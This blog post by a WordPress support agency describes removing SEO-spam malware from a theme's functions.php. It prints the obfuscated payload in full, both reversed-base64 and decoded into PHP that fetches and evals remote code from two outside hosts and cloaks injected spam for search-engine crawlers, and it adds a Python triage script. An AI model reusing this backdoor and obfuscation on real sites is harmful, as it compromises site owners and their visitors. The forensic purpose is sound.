Fighting WordPress Malware and Spam – “sun viagra prescriptions” In the Header

At one point or another, you’ll encounter a website that has a line or link that seems out of place. In the case of this particular website, the phrase “sun viagra prescriptions”, with a link one would never want to click, had inserted itself onto every page of the website. Unfortunately for the website owner, this was ruining their business’s credibility.

As a well-versed WordPress expert, I knew exactly where to look first. Okay, maybe not first, but I had a list of several places to look at right away. Lo and behold, the offender was to be found in the functions.php file. The spam was inserted as a Base64-encoded string, which is pretty typical of this sort of attack. Except that, to avoid detection by anti-virus/malware scanners on the server, the Base64 string had also been reversed.

While I wanted to remove the offending code immediately, it is also important to perform a bit of WordPress forensics to pinpoint what the code is doing, so you can make sure it doesn’t come back.

The first step is to reverse the string through my tool of choice: http://www.string-functions.com/reverse.aspx

Here is the string before reversal:

"=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"

Here is the string once it is reversed:

ZnVuY3Rpb24gZ2V0X3VybF85OTkoJHVybCl7JGNvbnRlbnQ9IiI7JGNvbnRlbnQ9QHRyeWN1cmxfOTk5KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmaWxlXzk5OSgkdXJsKTtpZigkY29udGVudCE9PWZhbHNlKXJldHVybiAkY29udGVudDskY29udGVudD1AdHJ5Zm9wZW5fOTk5KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmc29ja29wZW5fOTk5KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlzb2NrZXRfOTk5KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50O3JldHVybiAnJzt9CmZ1bmN0aW9uIHRyeWN1cmxfOTk5KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0Jyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGNoID0gY3VybF9pbml0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fQpmdW5jdGlvbiB0cnlmaWxlXzk5OSgkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ2ZpbGUnKT09PWZhbHNlKXJldHVybiBmYWxzZTskaW5jPUBmaWxlKCR1cmwpOyRidWY9QGltcGxvZGUoJycsJGluYyk7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtyZXR1cm4gJGJ1Zjt9CmZ1bmN0aW9uIHRyeWZvcGVuXzk5OSgkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ2ZvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGJ1Zj0nJzskZj1AZm9wZW4oJHVybCwncicpO2lmICgkZil7d2hpbGUoIWZlb2YoJGYpKXskYnVmLj1mcmVhZCgkZiwxMDAwMCk7fWZjbG9zZSgkZik7fWVsc2UgcmV0dXJuIGZhbHNlO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRidWY7fQpmdW5jdGlvbiB0cnlmc29ja29wZW5fOTk5KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZnNvY2tvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JHA9QHBhcnNlX3VybCgkdXJsKTskaG9zdD0kcFsnaG9zdCddOyR1cmk9JHBbJ3BhdGgnXS4nPycuJHBbJ3F1ZXJ5J107JGY9QGZzb2Nrb3BlbigkaG9zdCw4MCwkZXJybm8sICRlcnJzdHIsMzApO2lmKCEkZilyZXR1cm4gZmFsc2U7JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7ZndyaXRlKCRmLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCFmZW9mKCRmKSl7JGJ1Zi49ZnJlYWQoJGYsMTAwMDApO31mY2xvc2UoJGYpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBs
b2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fQpmdW5jdGlvbiB0cnlzb2NrZXRfOTk5KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnc29ja2V0X2NyZWF0ZScpPT09ZmFsc2UpcmV0dXJuIGZhbHNlOyRwPUBwYXJzZV91cmwoJHVybCk7JGhvc3Q9JHBbJ2hvc3QnXTskdXJpPSRwWydwYXRoJ10uJz8nLiRwWydxdWVyeSddOyRpcDE9QGdldGhvc3RieW5hbWUoJGhvc3QpOyRpcDI9QGxvbmcyaXAoQGlwMmxvbmcoJGlwMSkpOyBpZiAoJGlwMSE9JGlwMilyZXR1cm4gZmFsc2U7JHNvY2s9QHNvY2tldF9jcmVhdGUoQUZfSU5FVCxTT0NLX1NUUkVBTSxTT0xfVENQKTtpZiAoIUBzb2NrZXRfY29ubmVjdCgkc29jaywkaXAxLDgwKSl7QHNvY2tldF9jbG9zZSgkc29jayk7cmV0dXJuIGZhbHNlO30kcmVxdWVzdCA9IkdFVCAkdXJpIEhUVFAvMS4wXG4iOyRyZXF1ZXN0Lj0iSG9zdDogJGhvc3RcblxuIjtzb2NrZXRfd3JpdGUoJHNvY2ssJHJlcXVlc3QpOyRidWY9Jyc7d2hpbGUoJHQ9c29ja2V0X3JlYWQoJHNvY2ssMTAwMDApKXskYnVmLj0kdDt9QHNvY2tldF9jbG9zZSgkc29jayk7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtsaXN0KCRtLCRidWYpPWV4cGxvZGUoY2hyKDEzKS5jaHIoMTApLmNocigxMykuY2hyKDEwKSwkYnVmKTtyZXR1cm4gJGJ1Zjt9CmZ1bmN0aW9uIHN0cl9yZXBsYWNlX2ZpcnN0KCRzZWFyY2gsICRyZXBsYWNlLCAkc3ViamVjdCkgeyRwb3MgPSBzdHJpcG9zKCRzdWJqZWN0LCAkc2VhcmNoKTtpZiAoJHBvcyAhPT0gZmFsc2UpIHsJJHN1YmplY3QgPSBzdWJzdHJfcmVwbGFjZSgkc3ViamVjdCwgJHJlcGxhY2UsICRwb3MsIHN0cmxlbigkc2VhcmNoKSk7fQlyZXR1cm4gJHN1YmplY3Q7fQpmdW5jdGlvbiBpc19ib3RfdWEoKXskYm90PTA7JHVhPUAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107aWYgKHN0cmlzdHIoJHVhLCJtc25ib3QiKXx8c3RyaXN0cigkdWEsIllhaG9vIikpJGJvdD0xO2lmIChzdHJpc3RyKCR1YSwiYmluZ2JvdCIpfHxzdHJpc3RyKCR1YSwiZ29vZ2xlYm90IikpJGJvdD0xO3JldHVybiAkYm90O30KZnVuY3Rpb24gaXNfZ29vZ2xlYm90X2lwKCl7JGs9MDskaXA9c3ByaW50ZigiJXUiLEBpcDJsb25nKEAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXSkpO2lmICgoJGlwPj0xMTIzNjMxMTA0KSYmKCRpcDw9MTEyMzYzOTI5NSkpJGs9MTtyZXR1cm4gJGs7fQoKZnVuY3Rpb24gdXBkYXRlX2ZpbGVfOTk5KCl7CgoJJHVyaT0iZy5waHA/dD1wJmk9YjM3YTg5MTIiOwoJJGFjdHVhbDE9Imh0dHA6Ly9ubGludGhld29vZC5jb20vIi4kdXJpOwoJJGFjdHVhbDI9Imh0dHA6Ly9tYXhpZ2cucnUvIi4kdXJpOwoJJHZhbD1nZXRfdXJsXzk5OSgkYWN0dWFsMSk7CglpZiAoJHZhbD09IiIpJHZhbD1nZXRfdXJsXzk5OSgkYWN0dWFsMik7CglpZiAoc3Ryc3RyKCR2YWwsInx8fENPREV8fHwiKSl7CgkJbGlzdCgkdmFsLCRjb2RlKT1leHBsb2RlKCJ8fHxDT0RFfHx8Iiwk
dmFsKTsKCQlldmFsKGJhc2U2NF9kZWNvZGUoJGNvZGUpKTsKCX0KCXJldHVybiAkdmFsOwp9CgoKCmZ1bmN0aW9uIGNhbGxiYWNrX2Z1bmN0aW9uX3BocCgkcCkgewoKCWlmIChpc3NldCgkX0NPT0tJRVsnd29yZHByZXNzX3Rlc3RfY29va2llJ10pIHx8IGlzc2V0KCRfQ09PS0lFWyd3cC1zZXR0aW5ncy0xJ10pIHx8IGlzc2V0KCRfQ09PS0lFWyd3cC1zZXR0aW5ncy10aW1lLTEnXSkgfHwgKGZ1bmN0aW9uX2V4aXN0cygnaXNfdXNlcl9sb2dnZWRfaW4nKSAmJiBpc191c2VyX2xvZ2dlZF9pbigpKSApIHsKCQlyZXR1cm4gJHA7Cgl9CgoJJHg9J3tvcHRpb25zX25hbWVzfSc7CgkkYnVmPSIiOwoJJHVwZGF0ZT0wOwoJaWYgKCEkayA9IGdldF9vcHRpb24oJHgpKXsKCQlpZiAoIWFkZF9vcHRpb24oJHgsQXJyYXkoKSwnJywnbm8nKSl7CgkJCXJldHVybiAkcDsKCQl9CgkJJHVwZGF0ZT0xOwoJfWVsc2V7CgkJJGN0aW1lPXRpbWUoKS1AJGtbMV07CgkJaWYgKCRjdGltZT4zNjAwKjEyKXsKCQkJJHVwZGF0ZT0xOwoJCX0KCQkKCX0KCWlmICgkdXBkYXRlKXsKCQkkdmFsPXVwZGF0ZV9maWxlXzk5OSgpOwoJCSRrPWFycmF5KCk7CgkJJGtbMF09JHZhbDsKCQkka1sxXT10aW1lKCk7CgkJaWYgKCF1cGRhdGVfb3B0aW9uKCR4LCRrKSl7CgkJCXJldHVybiAkcDsKCQl9Cgl9CglpZiAoISRrID0gZ2V0X29wdGlvbigkeCkpewoJCXJldHVybiAkcDsKCX0KCgkkYnVmPUAka1swXTsKCWlmICgkYnVmPT0iIil7CgkJcmV0dXJuICRwOwoJfQoJbGlzdCgkdHlwZSwkdGV4dCk9QGV4cGxvZGUoInx8fCIsJGJ1Zik7CglpZiAoJHRleHQ9PSIiKXJldHVybiAkcDsKCgkkdHlwZSs9MDsKCSRib3Q9MDsKCWlmICgkdHlwZT09MCl7CgkJJGJ1ZjE9QGJhc2U2NF9kZWNvZGUoJHRleHQpOwoJCWxpc3QoJHRhZ2pzLCRqcywkdGFndGV4dDEsJHRleHQxKT1AZXhwbG9kZSgifHx8IiwkYnVmMSk7CgoJCWlmICgoJHRhZ2pzIT0iIikmJihzdHJpc3RyKCRwLCR0YWdqcykpKXsKCQkJJHA9c3RyX3JlcGxhY2VfZmlyc3QoJHRhZ2pzLCAkanMuIiAiLiR0YWdqcywgJHApOwoJCX1lbHNlewoJCQkkcD0kcC4kanM7CgkJfQoJCWlmICgoJHRhZ3RleHQxIT0iIikmJihzdHJpc3RyKCRwLCR0YWd0ZXh0MSkpKXsKCQkJJHA9c3RyX3JlcGxhY2VfZmlyc3QoJHRhZ3RleHQxLCAkdGV4dDEuIiAiLiR0YWd0ZXh0MSwgJHApOwoJCX1lbHNlewoJCQkkcD0kcC4kdGV4dDE7CgkJfQoJCQoJfWVsc2UKCWlmICgoJHR5cGU9PTEpfHwoJHR5cGU9PTIpfHwoJHR5cGU9PTMpfHwoJHR5cGU9PTQpKXsKCQlpZiAoKCR0eXBlPT0xKXx8KCR0eXBlPT00KSl7CgkJCSRib3Q9aXNfYm90X3VhKCk7CgkJfQoJCWlmICgoJHR5cGU9PTIpfHwoJHR5cGU9PTMpKXsKCQkJJGJvdD1pc19nb29nbGVib3RfaXAoKTsKCQl9CgoJCWlmICgkYm90KXsKCQkJJGJ1ZjE9QGJhc2U2NF9kZWNvZGUoJHRleHQpOwoJCQlsaXN0KCR0YWcsJHRleHQxKT1AZXhwbG9kZSgifHx8IiwkYnVmMSk7CgkJCWlmICgoJHRhZyE9
IiIpJiYoJHRleHQxIT0iIikpewoKCQkJCWlmIChzdHJpc3RyKCRwLCR0YWcpKXsKCQkJCQlpZiAoKCR0eXBlPT0zKXx8KCR0eXBlPT00KSl7CgkJCQkJCSRwPUBzdHJfaXJlcGxhY2UoJHRhZywkdGFnLiIgIi4kdGV4dDEsJHApOyAKCQkJCQl9ZWxzZXsKCQkJCQkJJHA9c3RyX3JlcGxhY2VfZmlyc3QoJHRhZywgJHRhZy4iICIuJHRleHQxLCAkcCk7CgkJCQkJfQoJCQkJfWVsc2V7CgkJCQkJJHA9JHAuJHRleHQxOwoJCQkJfQoJCQl9CgoJCX0KCX0KCgoJcmV0dXJuICRwOyAKfSAKCgoKb2Jfc3RhcnQoImNhbGxiYWNrX2Z1bmN0aW9uX3BocCIpOwo=

With the code reversed into a standard base64 format, it can then be decoded using this next tool: http://www.base64decode.org/

Here is the decoded string:

// Fetch helpers: try each transport available on the host until one returns content.
function get_url_999($url){$content="";$content=@trycurl_999($url);if($content!==false)return $content;$content=@tryfile_999($url);if($content!==false)return $content;$content=@tryfopen_999($url);if($content!==false)return $content;$content=@tryfsockopen_999($url);if($content!==false)return $content;$content=@trysocket_999($url);if($content!==false)return $content;return '';}
function trycurl_999($url){if(function_exists('curl_init')===false)return false;$ch = curl_init ();curl_setopt ($ch, CURLOPT_URL,$url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_TIMEOUT, 5);curl_setopt ($ch, CURLOPT_HEADER, 0);$result = curl_exec ($ch);curl_close($ch);if ($result=="")return false;return $result;}
function tryfile_999($url){if(function_exists('file')===false)return false;$inc=@file($url);$buf=@implode('',$inc);if ($buf=="")return false;return $buf;}
function tryfopen_999($url){if(function_exists('fopen')===false)return false;$buf='';$f=@fopen($url,'r');if ($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;if ($buf=="")return false;return $buf;}
function tryfsockopen_999($url){if(function_exists('fsockopen')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$f=@fsockopen($host,80,$errno, $errstr,30);if(!$f)return false;$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";fwrite($f,$request);$buf='';while(!feof($f)){$buf.=fread($f,10000);}fclose($f);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}
function trysocket_999($url){if(function_exists('socket_create')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false;$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";socket_write($sock,$request);$buf='';while($t=socket_read($sock,10000)){$buf.=$t;}@socket_close($sock);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}
// Case-insensitive replacement of the first occurrence only.
function str_replace_first($search, $replace, $subject) {$pos = stripos($subject, $search);if ($pos !== false) { $subject = substr_replace($subject, $replace, $pos, strlen($search));} return $subject;}
// Cloaking checks: search-engine crawlers get the injected content, ordinary visitors do not.
function is_bot_ua(){$bot=0;$ua=@$_SERVER['HTTP_USER_AGENT'];if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;if (stristr($ua,"bingbot")||stristr($ua,"googlebot"))$bot=1;return $bot;}
function is_googlebot_ip(){$k=0;$ip=sprintf("%u",@ip2long(@$_SERVER["REMOTE_ADDR"]));if (($ip>=1123631104)&&($ip<=1123639295))$k=1;return $k;}

// Payload fetch: pulls instructions from one of two remote hosts and eval()s any |||CODE||| segment.
function update_file_999(){
    $uri="g.php?t=p&i=b37a8912";
    $actual1="http://nlinthewood.com/".$uri;
    $actual2="http://maxigg.ru/".$uri;
    $val=get_url_999($actual1);
    if ($val=="")$val=get_url_999($actual2);
    if (strstr($val,"|||CODE|||")){
        list($val,$code)=explode("|||CODE|||",$val);
        eval(base64_decode($code));
    }
    return $val;
}

// Output-buffer callback: rewrites the rendered page before it is sent to the browser.
function callback_function_php($p) {
    // Logged-in users and anyone carrying WordPress cookies see a clean page.
    if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) ) {
        return $p;
    }

    // The fetched payload is cached in a wp_options row and refreshed every 12 hours.
    $x='{options_names}';
    $buf="";
    $update=0;
    if (!$k = get_option($x)){
        if (!add_option($x,Array(),'','no')){
            return $p;
        }
        $update=1;
    }else{
        $ctime=time()-@$k[1];
        if ($ctime>3600*12){
            $update=1;
        }
    }
    if ($update){
        $val=update_file_999();
        $k=array();
        $k[0]=$val;
        $k[1]=time();
        if (!update_option($x,$k)){
            return $p;
        }
    }
    if (!$k = get_option($x)){
        return $p;
    }

    $buf=@$k[0];
    if ($buf==""){
        return $p;
    }
    list($type,$text)=@explode("|||",$buf);
    if ($text=="")return $p;

    $type+=0;
    $bot=0;
    // Type 0: inject for everyone, placing JS and text next to the given anchor tags.
    if ($type==0){
        $buf1=@base64_decode($text);
        list($tagjs,$js,$tagtext1,$text1)=@explode("|||",$buf1);

        if (($tagjs!="")&&(stristr($p,$tagjs))){
            $p=str_replace_first($tagjs, $js." ".$tagjs, $p);
        }else{
            $p=$p.$js;
        }
        if (($tagtext1!="")&&(stristr($p,$tagtext1))){
            $p=str_replace_first($tagtext1, $text1." ".$tagtext1, $p);
        }else{
            $p=$p.$text1;
        }

    }else
    // Types 1-4: inject only when the visitor looks like a search-engine crawler.
    if (($type==1)||($type==2)||($type==3)||($type==4)){
        if (($type==1)||($type==4)){
            $bot=is_bot_ua();
        }
        if (($type==2)||($type==3)){
            $bot=is_googlebot_ip();
        }

        if ($bot){
            $buf1=@base64_decode($text);
            list($tag,$text1)=@explode("|||",$buf1);
            if (($tag!="")&&($text1!="")){

                if (stristr($p,$tag)){
                    if (($type==3)||($type==4)){
                        $p=@str_ireplace($tag,$tag." ".$text1,$p);
                    }else{
                        $p=str_replace_first($tag, $tag." ".$text1, $p);
                    }
                }else{
                    $p=$p.$text1;
                }
            }

        }
    }

    return $p;
}

// Registering the callback with ob_start() is what puts the spam on every page.
ob_start("callback_function_php");

Looking through the code, we can see how it pulls in the malware and causes mischief on the website: it fetches a payload from a remote host, caches it in a wp_options entry, and registers an output-buffer callback that inserts the spam text and links into every rendered page, hiding them from logged-in users and, for some payload types, showing them only to search-engine crawlers. It’s important to identify where the code is placing itself, and whether any other files are being generated. If so, they need to be removed.
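The two-step decode described above (reverse the string, then base64-decode it), followed by a first triage of the result, as an added Python example that is not part of the original post. It runs on a constructed sample with the same shape as the decoded script, not on the string from the page; the indicator list is derived from the behaviour visible in the decoded code (output-buffer hooking, remote fetch, eval of fetched code, crawler cloaking), and names such as INDICATORS, triage and fetch_x are chosen here. The integer constants passed to ip_range_to_dotted are the ones from is_googlebot_ip() above.

```python
import base64
import binascii
import ipaddress
import re

# Behaviours visible in the decoded script, keyed by the PHP text that reveals
# them. Any of these in a theme file is a reason to look closer.
INDICATORS = {
    "eval(base64_decode(": "executes code fetched from elsewhere",
    "ob_start(": "hooks the output buffer to rewrite every page",
    "curl_init": "fetches content from a remote host (cURL)",
    "fsockopen": "fetches content from a remote host (raw socket)",
    "HTTP_USER_AGENT": "branches on crawler user agent (cloaking)",
    "REMOTE_ADDR": "branches on visitor IP (cloaking)",
    "get_option(": "caches state in wp_options",
}

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s\"']*)?")


def _strip_wrapper(blob: str) -> str:
    """Remove whitespace and the quotes of a PHP string literal."""
    return blob.strip().strip("\"'")


def looks_like_reversed_base64(blob: str) -> bool:
    """True when reversing the blob yields well-formed base64 that decodes to text.

    Plain base64 never starts with '=', so a blob that does (as the one in the
    post did) is a strong hint that the padding has been moved to the front.
    """
    s = _strip_wrapper(blob)[::-1]
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        return False
    try:
        text = base64.b64decode(s, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def decode_reversed_base64(blob: str) -> str:
    """Undo the two layers the post describes: reverse, then base64-decode."""
    s = _strip_wrapper(blob)[::-1]
    return base64.b64decode(s, validate=True).decode("utf-8", errors="replace")


def triage(blob: str) -> dict:
    """Decode an obfuscated blob and summarise what the hidden code does."""
    if not looks_like_reversed_base64(blob):
        return {"decoded": None, "indicators": {}, "urls": []}
    php = decode_reversed_base64(blob)
    return {
        "decoded": php,
        "indicators": {k: v for k, v in INDICATORS.items() if k in php},
        "urls": URL_RE.findall(php),
    }


def ip_range_to_dotted(lo: int, hi: int) -> tuple:
    """Render an integer IP range like the one is_googlebot_ip() compares against."""
    return str(ipaddress.IPv4Address(lo)), str(ipaddress.IPv4Address(hi))


# Constructed fixture (not code from the page): a small PHP snippet with the
# same shape as the decoded script, base64-encoded and then reversed.
SAMPLE_PHP = (
    'function fetch_x($url){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);'
    'return curl_exec($ch);}\n'
    'function cb_x($p){$v=fetch_x("http://payload.invalid/g.php");'
    'if(strstr($v,"|||CODE|||")){list($v,$c)=explode("|||CODE|||",$v);'
    'eval(base64_decode($c));}return $p.$v;}\n'
    'ob_start("cb_x");\n'
)
OBFUSCATED = '"' + base64.b64encode(SAMPLE_PHP.encode()).decode()[::-1] + '"'

if __name__ == "__main__":
    report = triage(OBFUSCATED)
    print(report["decoded"])
    for hit, meaning in report["indicators"].items():
        print(f"  {hit:<22} {meaning}")
    print("  remote hosts:", report["urls"])
    print("  cloaking range:", ip_range_to_dotted(1123631104, 1123639295))
```

Running the script prints the recovered PHP, the matched indicators and the remote hosts it contacts; those hosts are what you would block at the firewall and search your access logs for. The integer bounds in is_googlebot_ip() come out as 66.249.64.0 to 66.249.95.255, so the cloaked payload types are aimed specifically at Google’s crawler, which is why the site owner may never see the spam in a normal browser.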

The offending reversed Base64 string was deleted from functions.php, and the problem was resolved. Because the script also caches its fetched payload in a wp_options row (the get_option/add_option/update_option calls above), that stored option should be located and removed as well.

So how exactly did this happen? Unfortunately, it’s hard to pinpoint in this specific instance. There are a number of vulnerabilities which can occur in themes, plugins, or the server and web host itself. Without knowing when the script was first inserted, and with updates to all of the aforementioned having happened between insertion, identification, and cleanup, the vulnerability that let it in may well have been fixed already.

In the never-ending cat-and-mouse game of WordPress malware, it is important to take appropriate security measures to reduce the chances of your WordPress site being successfully targeted. It is incredibly important to resolve malware issues as soon as possible, before search engines such as Google post malware warnings about your website when people try to find you via search. We at Frog Stone Media have encountered an inordinate amount of malware across a variety of clients. We work with several other agencies in providing support, security audits, and fixes. We’re happy to work with you, too.
